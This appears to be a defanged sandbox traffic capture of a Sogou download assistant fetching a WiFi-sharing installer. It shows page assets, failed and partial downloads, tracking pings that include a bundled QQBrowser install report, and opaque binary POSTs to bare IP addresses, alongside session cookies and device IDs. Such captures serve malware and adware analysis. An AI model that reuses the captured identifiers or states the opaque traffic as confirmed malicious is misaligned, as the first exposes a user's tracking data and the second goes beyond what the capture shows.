User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: text/css
Content-Length: 4074
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-fea"
Expires: Sun, 22 May 2016 07:13:10 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
body {.    margin: 0;.    padding: 0;.    background-color: #ccc;.}..h
1, h2, h3, h4, h5, h6, ul, li, body, dl, ol, dt, dd, td, img, th, p, f
orm, div, input {.    margin: 0;.    padding: 0;.    font-weight: norm
al;.    list-style: none;.    border: none;.}..a {.    text-decoration
: none;.    outline: none;.}...recommend-box {.    padding: 10px 0 20p
x;.    background-color: #fff;.    width: 424px;.    font: 12px "micro
soft yahei";.    color: #383838;.}..scrolling {.    width: 411px;.}..r
ec-banner {.    width: 380px;.    height: 122px;.    margin-left: 20px
;.    overflow: hidden;.    position: relative;;.}...left-btn, .right-
btn {.    z-index: 1;.    display: none;.    width: 22px;.    height: 
40px;.    position: absolute;.    top: 41px;.    background: url(../im
g/recommend-btn.png) no-repeat 0 0;.    _background: none;.    _filter
: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='img/recommen
d-btn.png', sizingMethod='crop');.    cursor: pointer;.}...left-btn:ho
ver {.    background-position: -58px 0;.}...right-btn {.    background
-position: -26px 0;.    right: 0;.}...right-btn:hover {.    background
-position: -84px 0;.}...state {.    display: block;.}...showbox {.    
position: absolute;.    width: 1140px;.    left: 0;.}...banner-pic {. 
   width: auto;.}...banner-pic li {.    float: left;.    width: 380px;
.}...banner-pic img {.    width: 380px;.    height: 122px;.}...banner-
doc {.    position: absolute;.    bottom: 0;.    left: 0;.    width: 3
80px;.    text-align: center;.    height: 14px;.    font-size: 0;.
<<< skipped >>>

GET /softassis/css/ranking.css HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: text/css
Content-Length: 2752
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-ac0"
Expires: Sun, 22 May 2016 07:13:10 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
body {.    margin: 0;.    padding: 0;.    background-color: #ccc;.}..h
1, h2, h3, h4, h5, h6, ul, li, body, dl, ol, dt, dd, td, img, th, p, f
orm, div, input {.    margin: 0;.    padding: 0;.    list-style: none;
.    border: none;.}..a {.    text-decoration: none;.    outline: none
;.}...ranking-box {.    padding-bottom: 20px;.    background-color: #f
ff;.    width: 424px;.    font: 12px "microsoft yahei";.    color: #38
3838;.    overflow: hidden;.}..scrolling {.    width: 411px;.}..scroll
ing .ranking-btn1 {.    margin-right: 11px;.}...ranking-list li {.    
overflow: hidden;.    padding: 20px 0 15px 20px;..clear:both;.}..ranki
ng-list li:hover {..background-color: #f7f7f7;.}...num {.    display: 
block;.    width: 18px;.    height: 18px;.    text-align: center;.    
float: left;.    margin: 17px 10px 0 0;.    font: 16px/20px Arial;.   
 font-weight: bold;.    color: #bababa;.}...num1 {.    color: #fff;.  
  font-weight: normal;.    background: url(../img/ranking-ico.png) no-
repeat;.    font-size: 12px;.    line-height: 18px;.}...ranking-logo {
.    width: 48px;.    height: 48px;.    float: left;.    margin: 2px 8
px 0 0;.}...ranking-info {.    overflow: hidden;.    width: auto;.    
float: left;.    line-height: 21px;.    color: #7a7a7a;.    margin-top
: -5px;.}...ranking-tit{..font-size: 12px;..overflow: hidden;..font-we
ight:normal;.}..ranking-tit a {.    color: #383838;.}...ranking-tit .s
oftware-name {.    display: block;.    width: 72px;.    overflow: hidd
en;.    white-space: nowrap;.    text-overflow: ellipsis;..float: 
<<< skipped >>>

GET /js/jquery-1.11.1.min.js HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:11 GMT
Content-Type: application/x-javascript
Content-Length: 95786
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-1762a"
Expires: Sun, 22 May 2016 07:13:11 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.o
rg/license */.!function(a,b){"object"==typeof module&&"object"==typeof
 module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.do
cument)throw new Error("jQuery requires a window with a document");ret
urn b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){v
ar c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=
h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(
a,b)},n=/^[\s\uFEFF\xA0] |[\s\uFEFF\xA0] $/g,o=/^-ms-/,p=/-([\da-z])/g
i,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,c
onstructor:m,selector:"",length:0,toArray:function(){return d.call(thi
s)},get:function(a){return null!=a?0>a?this[a this.length]:this[a]:
d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a
);return b.prevObject=this,b.context=this.context,b},each:function(a,b
){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map
(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return t
his.pushStack(d.apply(this,arguments))},first:function(){return this.e
q(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.le
ngth,c= a (0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]
:[])},end:function(){return this.prevObject||this.constructor(null)},p
ush:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var
 a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boole
an"==typeof g&&(j=g,g=arguments[h]||{},h  ),"object"==typeof g||m.
<<< skipped >>>

GET /img/recommend-btn.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:13 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error
3f..The URL has moved <a href="hXXp://xz.sogou.com/error">here&l
t;/a>...0......


GET /ie-css3.htc HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:13 GMT
Content-Length: 11952
Connection: keep-alive
ETag: "AVYcdCtTP6x"
Last-Modified: Tue, 17 May 2016 07:16:19 GMT
Accept-Ranges: bytes
...Do not remove this if you are using.....Original Author: Remiz Rahn
as..Original Author URL: hXXp://VVV.htmlremix.com..Published date: 200
8/09/24..Changes by Nick Fetchak:..- IE8 standards mode compatibility.
.- VML elements now positioned behind original box rather than inside 
of it ... should be less prone to breakage..- Added partial support fo
r ...box-shadow... style..- Checks for VML support before doing anythi
ng..- Updates VML element size and position via timer and also via win
dow resize event..- lots of other small things..Published date : 2010/
03/14..hXXp://fetchak.com/ie-css3..Thanks to TheBrightLines.com (http:
//VVV.thebrightlines.com/2009/12/03/using-ies-filter-in-a-cross-browse
r-way) for enlightening me about the DropShadow filter..timer_length =
 200; // Milliseconds..border_opacity = false; // Use opacity on borde
rs of rounded-corner elements? Note: This causes antialiasing issues..
// supportsVml() borrowed from hXXp://stackoverflow.com/questions/6541
12/how-do-you-detect-support-for-vml-or-svg-in-a-browser..function sup
portsVml() {..if (typeof supportsVml.supported == ...undefined...) {..
var a = document.body.a(document_createElement_x_x_x_x_x(...div...));.
.a.innerHTML = ...;..var b = a.firstChild;..b.style.behavior = ...url(
#default#VML)...;..supportsVml.supported = b ? typeof b.adj == ...obje
ct...: true;..a.parentNode.removeChild(a);..}..return supportsVml.supp
orted..}..// findPos() borrowed from hXXp://VVV.quirksmode.org/js/find
pos.html..function findPos(obj) {..var curleft = curtop = 0;..if (
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:08 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=102&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463642027 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:47 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=233&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:48 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=234&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:49 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=103&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463642029 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:49 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx..Date: Thu, 19 May 2016 07:13:49 GMT..C
ontent-Type: application/octet-stream..Content-Length: 0..Connection: 
keep-alive......


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463642030 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:50 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx..Date: Thu, 19 May 2016 07:13:50 GMT..C
ontent-Type: application/octet-stream..Content-Length: 0..Connection: 
keep-alive......



POST / HTTP/1.1
Host: 58.254.134.238:80
Content-type: application/octet-stream
Content-Length: 44
Connection: Keep-Alive

A....... ........r.8.=.n4E....)7 ..l.....7`.
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 28..Content-Type: application/octet-s
tream..Connection: Close..A...........~P..O........h....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=3869205-4570045
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2467523-3168363
Referer: hXXp://112.5.251.214/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



HEAD /v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hXXp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: imgstore.cdn.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:45 GMT
Content-Type: image/jpeg
Content-Length: 3008
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 07:12:45 GMT
Expires: Fri, 20 May 2016 07:12:45 GMT
Cache-Control: max-age=86400
ETag: 26af685efd16b705eda32b3ecb87e163
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_29_21



POST / HTTP/1.1
Host: 123.129.242.140:80
Content-type: application/octet-stream
Content-Length: 252
Connection: Keep-Alive

<[email protected].&.!.J.qK......gE,M.3..*........n.5...`i...A..nv.>..=p~..T..v.B..b.K.k.3=.i.U..!.%.cg.)...... H.9......-.K..*
..;q.U.
-&0.u)...S...lv.oI..<.~U....4[... o.7.....T...|b.2RG.....6E..Ru.u1. n.
6Q.....l.puE.....2.M.e0.L.
HTTP/1.1 200 OK
Content-Length: 1020
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 1020..Content-Type: application/octet
-stream..Connection: Close..<.............O..kuOs3"m..b|...&S\K..@r
.P.F.#.....D........ e.......d.....Ij...N...%.(.~hg....K....2...l.~.B.
.'...Q.w]...N.9].Z.R..l;...m....(.J.....m......}q7..b.....=.]..x....._
.:\....,..!L."..'...........`.......!..9`..........8....O..v.....<.
...d..Q.)@...B.`....(.'.......<*G1F...m.^.b..R.......\V..,..P....~.
eW.rL.5....hT......k<...xW....0C.. HA:...0bB...~.O.(<O&J..j.e*
".(*.p.k.>.[3..R[.[..3$..Z.....&F.yn. 6..Q,ue]...k...X.....D.D}.:..
..-6GB`.q]Is1}h5.....Tz...;".87.Hf...... ...P.G7.8p..sz=.).V.w...\tZX.
7?.......#.o....bk.(Hm..d,>S..o%.a.r.y..e....?.. T.L.(.0>.....5r
.a.....=x.d...a..|k@.....).4!.....y....m.l.][email protected]....,.8..y[Cw{.
^w0.!...:F..\.&...PhQ..Hs..9.T.Ir..]...'....9m..f.][email protected].
>)....\gO..z.}._.....cGJGj..g....q..^..G..\"[email protected].$.yY..X...
#.S,.....f.!.;/4.@...#..m.'...U!...\.....}..n...$._...'eC.b3..v-.L.|v=
P1.sf.!m(..i^[email protected]..#..W.."F..6.85ra.K...J..3b......N.V.@6M
..s....=d.Y%.c..c.G..l......<;.*..G. /;G....../_(.\._.....?...u..&l
t;.|.O...k..H..U..}8......x&Lg...



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:20 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=4570046-5971727
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 1401682
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 4570046-5971727/11709528
..Q..0...1<.]H?.MAkS..Z..V.....^H........q.".&01....\O..Z...Z. ...K
Tv.....We. .........R..**t .{=.>...j.<.5..ix..dy..`.]..N.;-..W.?
.g..Zp.#e..gQB.4...V.\.l.....(.X..$.....}@...<.`...7d.6.Vzk...P...5
.5Q.s.~.J...W29*.V.J..Vc........a.Vsg.7|..D..._a.U....e..V.\.....I...X
..#..... ..^JWKf.....\..K....&.X[..h ....."..[V.>..4 t..}...OlSxS.x
..([email protected].!P....s.;..<.`D([email protected]..
...V.v.Pfm...N...4."..1......v....^..'.x/....7..J.[.4....9......[..0`n
\...nH.581G...M.zD:q....Ar.-/...[[email protected]...*%.8N...X.<..i
-.]qA..."...;...9..>.x./-..c..g.........7GXN...g....6..x.U.....z\..
..4..,C.a{r.]=A.S.C.1[.n...Y .m1.J.w.S?.........z2>...eL>.....9.
.G?>.Y...#.....8........n.......cXa...fwX)y....T...t~..Os......L.pU
..1v.A..9..R.....[.<|......,.\......iy..............A%..N.K.../..s.
~...k..~3.%D.?Sx....1..Rb=.C-r._.C...L.../.!n^...N0l........./.r..Ue|N
[...r.&*.N.X...y.U.L...... _%R.....i.&..`( ..}......h.Wd...XAs.: Ja...
N......-_.G......-...$p..x3.P.'.......*[email protected].)..\H...q5.....P
h...o...V/v. .=..2.f>..u...g......)".@k..]*&t....d[8.....q*i.*I\.3.
K-..j...yM..mbx....1.._.c#..O.w...D?.......Y~q..6O._3...6.''7.....@...
..x.....}q..T....V.6.......?..i.bK0n..h.......H:;c.X..\...J./...5.....
.............ea.hI.o.7..V.[...........)...Wc..dN..!= .....)./...<..
../j?..qu.s..N.f.QT.,...G.n.4_....... (.....K.z.7...u..P....n.D.....j.
..1...I... L. .}9..v.....>.^]$4...v........X..D.Hc...k .E..L:..(..-
.R..EM......f.......v.C!..`...S~...q?.;.{[email protected]...
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=10176774-11578455
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 1401682
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 10176774-11578455/11709528
W.pL...sJ3A}...].7...aL...........[..D.8-.0;.....-../G. .$..?I...../.P
0q..v=..4.E.}[.....X..^.:;.../..n..l{;.....b...Z....[....a.$.[......%|
#..{)..mT.......wO..?.kZ.....!}l4.k.C.1G.f..V/q...B.........U...6f....
.g.\..v.....dL_m-xc..,O.......U.9.Y.X.m...0.1.. ~,9D.d.A.AL.....2..[H.
...s..]...$.F>....T....3...r8...[.x..........s\h}t/.>.R.J:.g:!:W
.l4}....AMj..L$.{.......)........p'.....E..u..M...p#.u|.e...A.zS...}[.
>.....\..mN.%..H..` .U..l..^1.\*.v ......mko.?.s...,K.I...*..M.C.?{
B.u...V..a.^[email protected]...(V.,....s..l.".|.....|e.H.....m..w........)l..
q...9[..)..Q.1....3.&73.,&....)~`I...D>(.......uHg.....5I....=.e/..
..Q.@\,.. ..K...<...K.....t....U.0.[...U....mL.$.P..n"...dN.L;.....
....I..E...4..../[email protected]...%....0x.w[^.B.."...Z"(.....Q..q
d./...^...*"}..l........xL.C'.....xo\..I.F3.......\..-.N..v.@2{.. ".Y.
kh.......{I[..H..3.B.......W.O.;...Y.G...4..GUI..........p...t..$.qd6b
%4H.....T.#../iz.NYaa....(.o.^.y.y.P.JNo.Z.~.#..X..7~88.'E........#C..
c..*.`.._.t?o}....a&......F..SY...G.o.N....%.dcl..xG.).UCq.......d....
...;=.}`9.0F.p.n..*]C.aM}....p..v...y..u.1....2..^BP.m..U...`..../....
...G([email protected]$....I.?|=.m..g.0...b..BH..#.........R!V.)......]
.........~....K..J.....%d......s..-.....$.......l...k/X.Ke.&.....o2...
.n.c~..P..3....g.5..4.jE..0.p.k.z."e......<<y.h .gtn...{.-P...`.
Ae....9,.i.K..3y.Eg.k3wt....YNO.N..bs..........G..b...n..B*.'..k.....)
.....*x..../.9......p..Q..@....\..x1i.0....%b....L...zI.....>.E.h..
....d.9...Q....>[K.c..10..r....E.'.Z..XP....x..,.......)..t...N
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5270887-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:30 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=11326565-11452510
Referer: hXXp://112.5.251.214/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



HEAD /web/redir.jsp?appdown=1&u=-9C432O39iSuy4v1X8mdGjRXb1ARchpxyTVF7GApCN1tS4L5kaabGHHpARrtteyVXkpO1EM9dsDQreZHL5I5rGNjItwiFZhBlM4pEm_3H9kSlCMAp8imlWvNyRK4fWevzSqGGyR3Ek0.&pcid=2320808333768086190&w=1950&filename=WiFi-2175.exe&extra=9_pconline&downloadtype=software HTTP/1.1
User-Agent: HttpRequest
Host: wap.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 302 Found
Server: nginx
Date: Thu, 19 May 2016 07:13:07 GMT
